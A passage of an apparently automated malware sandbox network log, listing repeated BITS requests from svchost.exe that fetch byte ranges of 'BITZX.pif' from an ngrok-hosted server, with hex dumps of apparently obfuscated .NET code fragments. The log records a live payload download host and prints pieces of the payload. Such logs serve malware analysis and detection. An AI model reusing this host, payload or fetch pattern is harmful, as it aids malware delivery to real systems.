        2024-12-16 16:40:56 UTC100INData Raw: 2f 00 00 00 4d 00 00 00 3e 00 00 00 8c 00 00 00 38 00 00 00 00 7e 51 00 00 0a 80 36 00 00 04 20 06 00 00 00 7e 2b 68 00 04 7b 15 68 00 04 39 bc ff ff ff 26 20 05 00 00 00 38 b1 ff ff ff 2a 28 3b f5 00 06 20 05 00 00 00 38 a1 ff ff ff 28 29 f6 00 06 20 02 00 00 00 38 92 ff ff ff 28 39 f5 00 06 20 03
        Data Ascii: /M>8~Q6 ~+h{h9& 8*(; 8() 8(9


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        28192.168.11.20497423.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:59 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=7176-7508
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:00 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 333
        Content-Range: bytes 7176-7508/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:59 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:00 UTC333INData Raw: 00 00 00 38 83 ff ff ff 14 fe 06 d3 00 00 06 73 07 01 00 06 80 35 00 00 04 20 00 00 00 00 7e 2b 68 00 04 7b 2d 68 00 04 3a 5e ff ff ff 26 20 00 00 00 00 38 53 ff ff ff 1f 0d 80 37 00 00 04 20 01 00 00 00 7e 2b 68 00 04 7b 37 68 00 04 39 38 ff ff ff 26 20 01 00 00 00 38 2d ff ff ff 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 08 00 00 00 00 00 00 00 00 14 a5 91 00 00 01 2a 01 10 00 00 02 00 2c 00 7d a9 00 7b 00 00 00 00 03 30 08 00 08 00 00 00 00 00 00 00 00 14 a5 91 00 00 01 2a 41 1c 00 00 02 00 00 00 c9 07 00 00 4c 01 00 00 15 09 00 00 90 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 31 00 00 00 a9 01 00 00 da 01 00 00 6d 00 00 00 2d 00 00
        Data Ascii: 8s5 ~+h{-h:^& 8S7 ~+h{7h98& 8-0*0*0*,}{0*AL0*A1m-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        29192.168.11.20497433.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:03 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=7509-8140
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:04 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 632
        Content-Range: bytes 7509-8140/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:03 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:04 UTC632INData Raw: 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00
        Data Ascii: ********************************


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        30192.168.11.20497443.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:06 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=8141-8445
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:07 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 305
        Content-Range: bytes 8141-8445/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:06 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:07 UTC305INData Raw: 26 20 01 00 00 00 38 bb fe ff ff 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 a3 00 00 00 01 00 00 11 28 43 f5 00 06 20 04 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 39 00 00 00 38 00 00 00 14 00 00 00 64 00 00 00 05 00 00 00 38 34 00 00 00 28 39 f5 00 06 20 03 00 00 00 38 d3 ff ff ff 28 29 f6 00 06 20 00 00 00 00 7e 2b 68 00 04 7b f4 67 00 04 3a ba ff ff ff 26 20 00 00 00 00 38 af ff ff ff 2a 7f 3e 00 00 04 1f fd 28 54 00 00 0a 20 00 00 00 00 7e 2b 68 00 04 7b e0 67 00 04 39 8e ff ff ff 26 20 01 00 00 00 38 83 ff ff ff 28 3b f5 00 06 20 02 00 00 00 38 74 ff ff ff 00 13 30 03 00
        Data Ascii: & 80*******0(C 8E98d84(9 8() ~+h{g:& 8*>(T ~+h{g9& 8(; 8t0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        31192.168.11.20497453.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:09 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=8446-8617
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:10 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 172
        Content-Range: bytes 8446-8617/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:10 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:10 UTC172INData Raw: 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00
        Data Ascii: *****.(C(9***0*0*.(C(9***0*0*.(C(9


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        32192.168.11.20497463.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:12 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=8618-8869
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:13 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 252
        Content-Range: bytes 8618-8869/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:12 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:13 UTC252INData Raw: 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 a1 00 00 00 01 00 00 11 28 43 f5 00 06 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 05 00 00 00 39 00 00 00 15 00 00 00 06 00 00 00 48 00 00 00 38 00 00 00 00 2a 28 39 f5 00 06 20 02 00 00 00 38 d2 ff ff ff 28 3b f5 00 06 20 01 00 00 00 7e 2b 68 00 04 7b 18 68 00 04 3a b9 ff ff ff 26 20 01 00 00 00 38 ae ff ff ff 28 29 f6 00 06 20 04 00 00 00 38 9f ff ff ff 28 1a 01 00 06 80 46 00 00 04 20 00 00 00 00 7e 2b 68 00 04 7b 10 68 00 04 39 81 ff ff ff 26 20 00 00 00 00 38 76 ff ff ff 00
        Data Ascii: ***0***.(C(9***0(C 8E9H8*(9 8(; ~+h{h:& 8() 8(F ~+h{h9& 8v


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        33192.168.11.20497473.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:14 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=8870-9193
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:15 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 324
        Content-Range: bytes 8870-9193/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:14 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:15 UTC324INData Raw: 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 0e 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 05 00 56 02 00 00 31 00 00 11 28 43 f5 00 06 20 0c 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 0f 00 00 00 08 01 00 00 cf 00 00 00 e8 01 00 00 66 00 00 00 ce 00 00 00 05 00 00 00 8c 00 00 00 de 00 00 00 19 00 00 00 37 01 00 00 1d
        Data Ascii: 0*0*0*0***0*0*****.(C(9***0V1(C 8Ef7


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        34192.168.11.20497483.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:17 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=9194-9553
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:18 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 360
        Content-Range: bytes 9194-9553/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:17 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:18 UTC360INData Raw: 28 3d f5 00 06 a2 20 07 00 00 00 38 7d ff ff ff 28 3b f5 00 06 20 00 00 00 00 7e 2b 68 00 04 7b 14 68 00 04 3a 64 ff ff ff 26 20 01 00 00 00 38 59 ff ff ff 11 01 80 52 00 00 04 20 04 00 00 00 7e 2b 68 00 04 7b de 67 00 04 3a 3e ff ff ff 26 20 01 00 00 00 38 33 ff ff ff 7e e9 68 00 04 28 ff fb 00 06 7e 0a 69 00 04 28 83 fc 00 06 7e 0b 69 00 04 28 87 fc 00 06 80 4c 00 00 04 20 00 00 00 00 7e 2b 68 00 04 7b 36 68 00 04 39 fc fe ff ff 26 20 00 00 00 00 38 f1 fe ff ff 2a 28 29 f6 00 06 20 09 00 00 00 38 e1 fe ff ff 11 01 17 20 60 a4 20 d1 65 20 d9 35 da 50 61 7e 2b 68 00 04 7b e6 67 00 04 61 28 3d f5 00 06 a2 20 0e 00 00 00 38 b7 fe ff ff 7f 4e 00 00 04 fe 15 18 00 00 02 20 0a 00 00 00 38 a2 fe ff ff 7f 4f 00 00 04 16 6a 28 58 00 00 0a 20 02 00 00 00 fe 0e 00
        Data Ascii: (= 8}(; ~+h{h:d& 8YR ~+h{g:>& 83~h(~i(~i(L ~+h{6h9& 8*() 8 ` e 5Pa~+h{ga(= 8N 8Oj(X


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        35192.168.11.20497493.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:19 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=9554-9657
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:20 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 104
        Content-Range: bytes 9554-9657/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:20 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:20 UTC104INData Raw: 1a 68 00 04 61 28 3d f5 00 06 a2 20 03 00 00 00 38 10 fe ff ff 20 b3 ac aa 3f 20 1c af 30 61 61 7e 2b 68 00 04 7b 07 68 00 04 61 28 3d f5 00 06 28 51 01 00 06 7e 4a 68 00 04 28 83 f9 00 06 80 4b 00 00 04 20 06 00 00 00 38 d7 fd ff ff 19 8d 03 00 00 01 13 01 20 08 00 00 00 fe 0e 00 00 38 bd fd ff ff 00 00 13 30
        Data Ascii: ha(= 8 ? 0aa~+h{ha(=(Q~Jh(K 8 80


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        36192.168.11.20497503.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:23 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=9658-9961
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:23 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 304
        Content-Range: bytes 9658-9961/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:22 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:23 UTC304INData Raw: 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 06 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 16 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 10 00 00 00 00 25 00 41 66 00 6d 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 01 10 00 00 00 00 77 00 d2 49 01 6d 2d 00 00 01 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 28 00 00 00 3a 01 00 00 62 01 00 00 ed 00 00 00 2d 00 00 01 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 17 2a 41 34 00 00 02 00 00 00 9c 00 00 00 7e 00 00 00 1a 01 00 00 7b
        Data Ascii: *0*0*0*0*%Afm-0*wIm-0*0*0*A(:b-0*0*A4~{


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        37192.168.11.20497513.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:27 UTC230OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=9962-10374
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:27 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 413
        Content-Range: bytes 9962-10374/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:27 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:27 UTC413INData Raw: 00 00 02 00 00 00 9b 00 00 00 8e 00 00 00 29 01 00 00 68 00 00 00 00 00 00 00 00 00 00 00 4f 00 00 00 66 01 00 00 b5 01 00 00 70 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 34 00 00 02 00 00 00 78 01 00 00 cf 01 00 00 47 03 00 00 95 00 00 00 00 00 00 00 02 00 00 00 53 00 00 00 18 04 00 00 6b 04 00 00 6d 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 34 00 00 02 00 00 00 d3 00 00 00 7a 01 00 00 4d 02 00 00 6d 00 00 00 00 00 00 00 02 00 00 00 52 00 00 00 e9 03 00 00 3b 04 00 00 6d 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 7c 00 00 00 15 01 00 00 91 01 00 00 70 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 67
        Data Ascii: )hOfp-0*A4xGSkm0*A4zMmR;m0*A|p-0*Ag


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        38192.168.11.20497523.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:30 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=10375-10698
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:30 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 324
        Content-Range: bytes 10375-10698/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:29 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:30 UTC324INData Raw: 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00
        Data Ascii: ********************************


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        39192.168.11.20497533.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:33 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=10699-10807
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:33 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 109
        Content-Range: bytes 10699-10807/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:33 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:33 UTC109INData Raw: 3d f5 00 06 2a 36 2b 05 28 70 fa 1a 6c 20 7e bf 48 02 2a 00 00 a6 2b 05 28 0c 49 00 3b 20 52 f6 58 14 20 95 34 27 b1 59 20 e5 08 2b 27 61 7e 2b 68 00 04 7b 08 68 00 04 61 28 3d f5 00 06 2a 00 00 36 2b 05 28 a1 f8 1c 59 20 2b db f2 01 2a 00 00 92 2b 05 28 39 44 00 52 20 6c e0 99 5d 66 20 50 0b fc fc 61 7e 2b 68 00 04 7b 07 68
        Data Ascii: =*6+(pl ~H*+(I; RX 4'Y +'a~+h{ha(=*6+(Y +*+(9DR l]f Pa~+h{h


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        40192.168.11.20497543.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:35 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=10808-11121
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:35 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 314
        Content-Range: bytes 10808-11121/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:34 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:35 UTC314INData Raw: 00 04 61 28 3d f5 00 06 2a 00 00 00 36 2b 05 28 62 20 76 45 20 94 79 34 02 2a 00 00 a6 2b 05 28 09 20 3e 3d 20 9b c9 8e 19 20 db 80 c4 a4 61 20 45 1a 25 b0 61 7e 2b 68 00 04 7b f2 67 00 04 61 28 3d f5 00 06 2a 00 00 36 2b 05 28 4b 78 38 55 20 25 6b 55 00 2a 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 22 2b 05 28 2a e9 5a 52 2a 00 00 00 13 30 03 00 89 00 00 00 01 00 00 11 28 43 f5 00 06 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 4e 00 00 00 2a 00 00 00 05 00 00 00 06 00 00 00 38 49 00 00 00 2a 28 9a 01 00 06 20 01 00 00 00 7e 2b 68 00 04 7b 34 68 00 04 39 cc ff ff ff 26 20 02 00 00 00 38 c1 ff ff ff 28 39 f5 00 06 20 00 00 00 00 7e 2b 68 00 04 7b 12 68 00 04 39 a8 ff ff ff 26 20 00 00 00 00 38 9d ff ff ff 28 3b f5 00 06 20 03 00 00
        Data Ascii: a(=*6+(b vE y4*+( >= a E%a~+h{ga(=*6+(Kx8U %kU*.(C(9*"+(*ZR*0(C 8EN*8I*( ~+h{4h9& 8(9 ~+h{h9& 8(;


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        41192.168.11.20497553.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:37 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=11122-11204
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:37 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 83
        Content-Range: bytes 11122-11204/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:36 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:37 UTC83INData Raw: 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13
        Data Ascii: **0**0**0*


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        42192.168.11.20497563.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:39 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=11205-11231
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:39 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 27
        Content-Range: bytes 11205-11231/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:39 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:39 UTC27INData Raw: 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00
        Data Ascii: 0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        43192.168.11.20497573.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:42 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=11232-11474
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:42 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 243
        Content-Range: bytes 11232-11474/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:41 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
